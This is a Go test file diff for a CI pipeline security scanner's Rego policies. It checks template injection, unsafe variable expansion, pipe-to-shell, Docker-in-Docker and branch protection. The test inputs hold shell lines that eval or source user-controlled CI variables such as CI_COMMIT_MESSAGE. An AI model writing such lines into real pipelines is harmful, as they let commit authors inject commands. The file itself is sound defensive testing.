+			pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+
+			hits := make([]string, 0, len(findings))
+			for _, f := range findings {
+				if f.Code != "ISSUE-414" {
+					continue
+				}
+				hits = append(hits, f.Job)
+			}
+			sort.Strings(hits)
+			expected := append([]string(nil), tc.expectedHits...)
+			sort.Strings(expected)
+			if !stringSlicesEqual(hits, expected) {
+				t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+			}
+		})
+	}
+}
+
+// TestIssue206_TemplateInjection drives the template_injection policy
+// against fixtures covering the two most common unsafe patterns and
+// the canonical safe env-variable workaround. Staging pattern as in
+// TestIssue509_ExcessivePermissions.
+func TestIssue206_TemplateInjection(t *testing.T) {
+	cases := []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{
+			fixture:      "violation_pr_title.yml",
+			expectedHits: []string{"violation_pr_title/bad"},
+		},
+		{
+			fixture:      "violation_head_ref.yml",
+			expectedHits: []string{"violation_head_ref/bad"},
+		},
+		{
+			fixture:      "clean_env_var.yml",
+			expectedHits: nil,
+		},
+	}
+
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.fixture, func(t *testing.T) {
+			tmp := t.TempDir()
+			wfDir := filepath.Join(tmp, ".github", "workflows")
+			if err := os.MkdirAll(wfDir, 0o755); err != nil {
+				t.Fatal(err)
+			}
+			src := filepath.Join("testdata", "ISSUE-206", "github", tc.fixture)
+			data, err := os.ReadFile(src)
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+				t.Fatal(err)
+			}
+
+			pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+
+			hits := make([]string, 0, len(findings))
+			for _, f := range findings {
+				if f.Code != "ISSUE-206" {
+					continue
+				}
+				hits = append(hits, f.Job)
+			}
+			sort.Strings(hits)
+			expected := append([]string(nil), tc.expectedHits...)
+			sort.Strings(expected)
+			if !stringSlicesEqual(hits, expected) {
+				t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+			}
+		})
+	}
+}
+
+// TestIssue208_InsecureCommands drives the insecure_commands policy
+// against a violation where `ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'`
+// is set at the job level, and a baseline job with benign env vars.
+// Staging pattern as in TestIssue509_ExcessivePermissions.
+func TestIssue208_InsecureCommands(t *testing.T) {
+	cases := []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{
+			fixture:      "violation_enabled.yml",
+			expectedHits: []string{"violation_enabled/bad"},
+		},
+		{
+			fixture:      "clean.yml",
+			expectedHits: nil,
+		},
+	}
+
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.fixture, func(t *testing.T) {
+			tmp := t.TempDir()
+			wfDir := filepath.Join(tmp, ".github", "workflows")
+			if err := os.MkdirAll(wfDir, 0o755); err != nil {
+				t.Fatal(err)
+			}
+			src := filepath.Join("testdata", "ISSUE-208", "github", tc.fixture)
+			data, err := os.ReadFile(src)
+			if err != nil {
+				t.Fatalf("read fixture: %v", err)
+			}
+			if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+				t.Fatal(err)
+			}
+
+			pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+			if err != nil {
+				t.Fatalf("scan: %v", err)
+			}
+
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+
+			hits := make([]string, 0, len(findings))
+			for _, f := range findings {
+				if f.Code != "ISSUE-208" {
+					continue
+				}
+				hits = append(hits, f.Job)
+			}
+			sort.Strings(hits)
+			expected := append([]string(nil), tc.expectedHits...)
+			sort.Strings(expected)
+			if !stringSlicesEqual(hits, expected) {
+				t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+			}
+		})
+	}
+}
+
+// TestIssue307_Artipacked drives the artipacked policy against a
+// default actions/checkout (violation) and one explicitly passing
+// `persist-credentials: false` (clean).
+func TestIssue307_Artipacked(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {
+ fixture: "violation_default_checkout.yml",
+ expectedHits: []string{"violation_default_checkout/clone"},
+ },
+ {
+ fixture: "clean_credentials_disabled.yml",
+ expectedHits: nil,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-307", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-307" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue103_ImagePinnedByDigest drives the image_pinned_by_digest
+// policy against GitLab and GitHub fixtures, covering both the tagged
+// violation and the digest-pinned clean baseline. The policy only
+// fires when mustBePinnedByDigest is explicitly enforced in the
+// input config.
+func TestIssue103_ImagePinnedByDigest(t *testing.T) {
+ type fixture struct {
+ file string
+ expectedJobHits []string
+ }
+ type providerSuite struct {
+ name string
+ dir string
+ parse func(*testing.T, []byte) *ir.NormalizedPipeline
+ fixtures []fixture
+ }
+
+ suites := []providerSuite{
+ {
+ name: "gitlab",
+ dir: filepath.Join("testdata", "ISSUE-103", "gitlab"),
+ parse: parseGitLabCI,
+ fixtures: []fixture{
+ {"violation_tagged.gitlab-ci.yml", []string{"build", "deploy"}},
+ {"clean_pinned.gitlab-ci.yml", nil},
+ },
+ },
+ {
+ name: "github",
+ dir: filepath.Join("testdata", "ISSUE-103", "github"),
+ parse: parseGitHubActions,
+ fixtures: []fixture{
+ {"violation_tagged.workflow.yml", []string{"build"}},
+ {"clean_pinned.workflow.yml", nil},
+ },
+ },
+ }
+
+ cfg := map[string]any{
+ "containerImageMustNotUseForbiddenTags": map[string]any{
+ "mustBePinnedByDigest": true,
+ },
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ for _, suite := range suites {
+ for _, fx := range suite.fixtures {
+ t.Run(suite.name+"/"+fx.file, func(t *testing.T) {
+ path := filepath.Join(suite.dir, fx.file)
+ data, err := os.ReadFile(path)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ pipeline := suite.parse(t, data)
+
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+
+ hits := make([]string, 0, len(findings))
+ for _, f := range findings {
+ if f.Code != "ISSUE-103" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), fx.expectedJobHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s/%s: expected %v, got %v",
+ suite.name, fx.file, expected, hits)
+ }
+ })
+ }
+ }
+}
+
+// TestIssue412_DockerInDocker flags GitLab jobs attaching a DinD service.
+func TestIssue412_DockerInDocker(t *testing.T) {
+ runGitLabPolicyCases(t, "ISSUE-412", []policyCase{
+ {"violation_dind.gitlab-ci.yml", []string{"docker-build"}},
+ {"clean_kaniko.gitlab-ci.yml", nil},
+ }, nil)
+}
+
+// TestIssue413_DockerInDockerInsecure flags DinD with TLS disabled.
+func TestIssue413_DockerInDockerInsecure(t *testing.T) {
+ runGitLabPolicyCases(t, "ISSUE-413", []policyCase{
+ {"violation_tls_disabled.gitlab-ci.yml", []string{"docker-build"}},
+ {"clean_tls_enabled.gitlab-ci.yml", nil},
+ }, nil)
+}
+
+// TestIssue203_DebugTrace flags jobs enabling CI_DEBUG_TRACE.
+// The legacy Go control disables itself when forbiddenVariables is
+// empty, so the Rego policy mirrors that contract: cfg must declare
+// the list explicitly β there is no built-in default.
+func TestIssue203_DebugTrace(t *testing.T) {
+ cfg := map[string]any{
+ "debugTrace": map[string]any{
+ "forbiddenVariables": []string{"CI_DEBUG_TRACE", "CI_DEBUG_SERVICES"},
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-203", []policyCase{
+ {"violation_debug_enabled.gitlab-ci.yml", []string{"deploy"}},
+ {"clean.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
+// TestIssue411_UnverifiedScripts flags pipe-to-shell patterns.
+func TestIssue411_UnverifiedScripts(t *testing.T) {
+ runGitLabPolicyCases(t, "ISSUE-411", []policyCase{
+ {"violation_pipe_to_shell.gitlab-ci.yml", []string{"install"}},
+ {"clean_checksum.gitlab-ci.yml", nil},
+ }, nil)
+}
+
+// TestIssue403_IncludesOutdated flags includes whose ref differs from
+// the resolved latest version.
+func TestIssue403_IncludesOutdated(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {Kind: "component", Source: "plumber/base", Ref: "1.0.0", Current: "1.2.3"},
+ {Kind: "component", Source: "plumber/other", Ref: "2.0.0", Current: "2.0.0"},
+ {Kind: "local", Source: "ci/lint.yml"},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-403" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-403 finding, got %d", hits)
+ }
+}
+
+// TestIssue501_BranchUnprotected flags branches matching a required
+// name pattern that the provider reports as unprotected.
+func TestIssue501_BranchUnprotected(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"release-*"},
+ "defaultMustBeProtected": true,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ DefaultBranch: "main",
+ Branches: []ir.Branch{
+ {Name: "main", Protected: false},
+ {Name: "release-1.0", Protected: false},
+ {Name: "feature/foo", Protected: false},
+ {Name: "main-protected", Protected: true}, // just noise
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-501" {
+ hits++
+ }
+ }
+ if hits != 2 {
+ t.Fatalf("expected 2 ISSUE-501 findings (main + release-1.0), got %d", hits)
+ }
+}
+
+// TestIssue505_BranchNonCompliant flags protected branches whose
+// settings fail to meet the declared minimum bar.
+func TestIssue505_BranchNonCompliant(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"main", "low-push"},
+ "allowForcePush": false,
+ "codeOwnerApprovalRequired": true,
+ "minPushAccessLevel": 40,
+ "minMergeAccessLevel": 40,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Branches: []ir.Branch{
+ // main: force push + code owner failures only β push/merge match policy.
+ {Name: "main", Protected: true, AllowForcePush: true, MinPushAccessLevel: 40, MinMergeAccessLevel: 40},
+ {Name: "compliant", Protected: true, CodeOwnerApprovalRequired: true, MinPushAccessLevel: 40, MinMergeAccessLevel: 40},
+ // low-push: push level 30 < 40 (more permissive than required).
+ {Name: "low-push", Protected: true, CodeOwnerApprovalRequired: true, MinPushAccessLevel: 30, MinMergeAccessLevel: 40},
+ {Name: "unprotected", Protected: false},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := map[string]bool{}
+ issue505ByJob := map[string]opaengine.Finding{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-505" {
+ if issue505ByJob[f.Job].Code != "" {
+ t.Fatalf("expected at most one ISSUE-505 per branch, got duplicate for %q", f.Job)
+ }
+ issue505ByJob[f.Job] = f
+ hits[f.Job] = true
+ }
+ }
+ if !hits["main"] || !hits["low-push"] {
+ t.Fatalf("expected main and low-push flagged, got %v", hits)
+ }
+ mainF := issue505ByJob["main"]
+ if !strings.Contains(mainF.Message, "main") || !strings.Contains(mainF.Message, "non-compliant") {
+ t.Fatalf("unexpected ISSUE-505 message for main: %q", mainF.Message)
+ }
+ raw, _ := mainF.Data["reasons"].([]interface{})
+ if len(raw) != 2 {
+ t.Fatalf("expected 2 sub-reasons for main, got %v (Data=%v)", raw, mainF.Data)
+ }
+ if hits["compliant"] || hits["unprotected"] {
+ t.Fatalf("unexpected flag on compliant/unprotected: %v", hits)
+ }
+}
+
+// TestIssue505_AccessLevelStrictestPolicy: GitLab access level 0 = "No one".
+// When policy sets min*AccessLevel: 0, any non-zero branch level is too
+// permissive and should fire (legacy parity).
+func TestIssue505_AccessLevelStrictestPolicy(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"main"},
+ "minPushAccessLevel": 0,
+ "minMergeAccessLevel": 0,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Branches: []ir.Branch{
+ {Name: "main", Protected: true, MinPushAccessLevel: 40, MinMergeAccessLevel: 40},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ if len(findings) != 1 {
+ t.Fatalf("expected 1 finding, got %d: %+v", len(findings), findings)
+ }
+ reasons := toStringSlice(findings[0].Data["reasons"])
+ want := map[string]bool{
+ "Merge access level is too low (40, minimum: 0)": false,
+ "Push access level is too low (40, minimum: 0)": false,
+ }
+ for _, r := range reasons {
+ if _, ok := want[r]; ok {
+ want[r] = true
+ }
+ }
+ for k, hit := range want {
+ if !hit {
+ t.Fatalf("missing reason %q in %v", k, reasons)
+ }
+ }
+}
+
+// TestIssue505_AccessLevelSkipsWhenIRZero: legacy guard β when GitLab does
+// not report a level (cur == 0), no access-level finding is emitted, even if
+// policy requires a positive minimum.
+func TestIssue505_AccessLevelSkipsWhenIRZero(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "namePatterns": []string{"main"},
+ "minPushAccessLevel": 40,
+ "minMergeAccessLevel": 40,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Branches: []ir.Branch{
+ {Name: "main", Protected: true},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code != "ISSUE-505" {
+ continue
+ }
+ for _, r := range toStringSlice(f.Data["reasons"]) {
+ if strings.Contains(r, "access level") {
+ t.Fatalf("did not expect access-level reason when IR is 0: %q", r)
+ }
+ }
+ }
+}
+
// toStringSlice coerces a finding-data payload into []string. Values
// coming back from the Rego engine are decoded as []any, while tests
// may construct []string directly; both encodings are accepted.
// Non-string elements inside a []any are silently dropped, and any
// other input type (including nil) yields nil.
func toStringSlice(raw any) []string {
	switch v := raw.(type) {
	case []string:
		return v
	case []any: // `any` matches the file's prevailing idiom; identical to []interface{}
		out := make([]string, 0, len(v))
		for _, x := range v {
			if s, ok := x.(string); ok {
				out = append(out, s)
			}
		}
		return out
	}
	return nil
}
+
+// TestIssue505_NotInPolicyScope ensures ISSUE-501 scope matches ISSUE-505:
+// a protected but misconfigured branch that does not match namePatterns and
+// is not the default branch when defaultMustBeProtected is false produces no ISSUE-505.
+func TestIssue505_NotInPolicyScope(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "branchMustBeProtected": map[string]any{
+ "defaultMustBeProtected": false,
+ "namePatterns": []string{"master", "release/*"},
+ "allowForcePush": false,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ DefaultBranch: "main",
+ Branches: []ir.Branch{
+ {Name: "main", Protected: true, AllowForcePush: true},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code == "ISSUE-505" {
+ t.Fatalf("expected no ISSUE-505 when main is out of policy scope, got %+v", f)
+ }
+ }
+}
+
+// TestIssue404_IncludesForbiddenVersion flags includes pinned to a
+// forbidden version.
+func TestIssue404_IncludesForbiddenVersion(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "includesForbiddenVersions": map[string]any{
+ "forbiddenVersions": []string{"dev"},
+ "defaultBranchIsForbiddenVersion": true,
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ DefaultBranch: "main",
+ Includes: []ir.Include{
+ {Kind: "component", Source: "plumber/a", Ref: "dev"},
+ {Kind: "component", Source: "plumber/b", Ref: "main"},
+ {Kind: "component", Source: "plumber/c", Ref: "1.0.0"},
+ {Kind: "hardcoded", Source: "plumber/d", Ref: "main"}, // skipped
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-404" {
+ hits++
+ }
+ }
+ if hits != 2 {
+ t.Fatalf("expected 2 ISSUE-404 findings, got %d", hits)
+ }
+}
+
+// TestIssue204_UnsafeVariableExpansion flags scripts re-parsing
+// user-controlled CI variables through a shell.
+func TestIssue204_UnsafeVariableExpansion(t *testing.T) {
+ cfg := map[string]any{
+ "unsafeVariableExpansion": map[string]any{
+ "dangerousVariables": []string{"CI_COMMIT_MESSAGE", "CI_COMMIT_BRANCH"},
+ "allowedPatterns": []string{},
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-204", []policyCase{
+ {"violation_eval.gitlab-ci.yml", []string{"deploy"}},
+ {"clean_echo.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
+// TestIssue401_HardcodedJobs flags jobs whose origin is "hardcoded".
+// parseGitLabCI does not know about origins (that data comes from the
+// full pipelineOriginData), so this test builds the IR directly.
+func TestIssue401_HardcodedJobs(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "build", OriginKind: "hardcoded"},
+ {Name: "lint", OriginKind: "component"},
+ {Name: "deploy"}, // unknown origin β not flagged
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-401" {
+ hits = append(hits, f.Job)
+ }
+ }
+ if len(hits) != 1 || hits[0] != "build" {
+ t.Fatalf("expected only [build], got %v", hits)
+ }
+}
+
+// TestIssue101_ImageAuthorizedSources flags jobs using images from
+// untrusted registries. Exercises the Docker-Hub-official-image
+// fast-path and the trustedUrls glob matcher. Uses hand-built IRs
+// because parseGitLabCI does not extract Image.Registry.
+func TestIssue101_ImageAuthorizedSources(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "imageAuthorizedSources": map[string]any{
+ "trustedUrls": []string{"registry.company.com/*"},
+ "trustDockerHubOfficial": true,
+ },
+ }
+
+ cases := []struct {
+ name string
+ image ir.Image
+ expected bool
+ }{
+ {"official_docker_hub", ir.Image{Name: "python", Tag: "3.12", Registry: "docker.io"}, false},
+ {"company_registry", ir.Image{Name: "registry.company.com/app", Tag: "1.0"}, false},
+ {"untrusted_registry", ir.Image{Name: "attacker/unknown", Tag: "1.0", Registry: "ghcr.io"}, true},
+ }
+ for _, tc := range cases {
+ t.Run(tc.name, func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{Name: "build", Image: &tc.image}},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ found := false
+ for _, f := range findings {
+ if f.Code == "ISSUE-101" {
+ found = true
+ }
+ }
+ if found != tc.expected {
+ t.Fatalf("%s: expected violation=%v, got %v (findings=%+v)", tc.name, tc.expected, found, findings)
+ }
+ })
+ }
+}
+
+// TestIssue410_SecurityJobsWeakened flags SAST-like jobs with
+// allow_failure: true or when: manual.
+func TestIssue410_SecurityJobsWeakened(t *testing.T) {
+ cfg := map[string]any{
+ "securityJobsWeakened": map[string]any{
+ "securityJobPatterns": []string{"sast", "*-sast", "secret_detection"},
+ "allowFailureMustBeFalse": true,
+ "whenMustNotBeManual": true,
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-410", []policyCase{
+ {"violation_allow_failure.gitlab-ci.yml", []string{"sast"}},
+ {"violation_manual.gitlab-ci.yml", []string{"sast"}},
+ {"clean.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
+// TestIssue205_JobVariableOverride flags pipeline jobs that set a
+// variable protected by .plumber.yaml.
+func TestIssue205_JobVariableOverride(t *testing.T) {
+ cfg := map[string]any{
+ "jobVariablesOverride": map[string]any{
+ "protectedVariables": []string{"PROD_TOKEN"},
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-205", []policyCase{
+ {"violation_override.gitlab-ci.yml", []string{"deploy"}},
+ {"clean.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
+// TestIssue404_WildcardForbiddenVersion locks in legacy go-wildcard
+// parity: a `v*` pattern in forbiddenVersions must match `v1.0.0`
+// just like the legacy gitlab.CheckItemMatchToPatterns helper.
+// Hardcoded includes are skipped regardless of ref.
+func TestIssue404_WildcardForbiddenVersion(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "includesForbiddenVersions": map[string]any{
+ "forbiddenVersions": []string{"v*"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {Kind: "component", Source: "plumber/a", Ref: "v1.0.0"}, // matches v*
+ {Kind: "component", Source: "plumber/b", Ref: "1.0.0"}, // no match
+ {Kind: "hardcoded", Source: "plumber/c", Ref: "v9.9.9"}, // skipped (kind)
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-404" {
+ hits = append(hits, f.Job)
+ }
+ }
+ if len(hits) != 1 || hits[0] != "plumber/a" {
+ t.Fatalf("expected only [plumber/a] flagged via wildcard, got %v", hits)
+ }
+}
+
+// TestIssue204_SourceAndDotSourcing covers the two patterns that were
+// missing from the Rego port: `source script.sh` and `. script.sh`.
+// Both re-parse the file as shell, so a tainted variable used in one
+// is just as dangerous as `eval`.
+func TestIssue204_SourceAndDotSourcing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "unsafeVariableExpansion": map[string]any{
+ "dangerousVariables": []string{"CI_COMMIT_MESSAGE"},
+ "allowedPatterns": []string{},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "src", Scripts: []string{`source ${CI_COMMIT_MESSAGE}`}},
+ {Name: "dot", Scripts: []string{`. ${CI_COMMIT_MESSAGE}`}},
+ {Name: "comment", Scripts: []string{`# eval $CI_COMMIT_MESSAGE`}}, // skipped
+ {Name: "echo", Scripts: []string{`echo $CI_COMMIT_MESSAGE`}}, // safe
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-204" {
+ hits = append(hits, f.Job)
+ }
+ }
+ sort.Strings(hits)
+ want := []string{"dot", "src"}
+ if !stringSlicesEqual(hits, want) {
+ t.Fatalf("expected %v, got %v", want, hits)
+ }
+}
+
+// TestIssue204_VariableWordBoundary locks in the legacy regex
+// `\$VAR(?:[^a-zA-Z0-9_]|$)` so `$CI_COMMIT_MESSAGE` is flagged but
+// `$CI_COMMIT_MESSAGE_OTHER` is not. The naive `contains` form (the
+// previous Rego implementation) over-matched.
+func TestIssue204_VariableWordBoundary(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "unsafeVariableExpansion": map[string]any{
+ "dangerousVariables": []string{"CI_COMMIT_BRANCH"},
+ "allowedPatterns": []string{},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "exact", Scripts: []string{`eval "$CI_COMMIT_BRANCH"`}},
+ {Name: "prefix-only", Scripts: []string{`eval "$CI_COMMIT_BRANCH_OTHER"`}},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-204" {
+ hits = append(hits, f.Job)
+ }
+ }
+ if len(hits) != 1 || hits[0] != "exact" {
+ t.Fatalf("expected only [exact] flagged, got %v", hits)
+ }
+}
+
+// TestIssue412_DindLatestAndRegistryPrefix locks in two legacy
+// behaviours of isDindImage: `docker:latest` is dind, and a
+// registry-prefixed `/docker:dind` is dind. A non-`docker`
+// image with `dind` in the tag (e.g. `nginx:dind`) must NOT match.
+func TestIssue412_DindLatestAndRegistryPrefix(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "latest", Services: []ir.Image{{Name: "docker", Tag: "latest"}}},
+ {Name: "registry-dind", Services: []ir.Image{{Name: "registry.gitlab.com/group/docker", Tag: "dind"}}},
+ {Name: "bare-docker", Services: []ir.Image{{Name: "docker"}}}, // no tag β not dind
+ {Name: "nginx-dind", Services: []ir.Image{{Name: "nginx", Tag: "dind"}}}, // wrong name β not dind
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-412" {
+ hits = append(hits, f.Job)
+ }
+ }
+ sort.Strings(hits)
+ want := []string{"latest", "registry-dind"}
+ if !stringSlicesEqual(hits, want) {
+ t.Fatalf("expected %v, got %v", want, hits)
+ }
+}
+
+// TestIssue412_OneFindingPerJob mirrors the legacy `break` after the
+// first matched dind service. Even with two dind services on the same
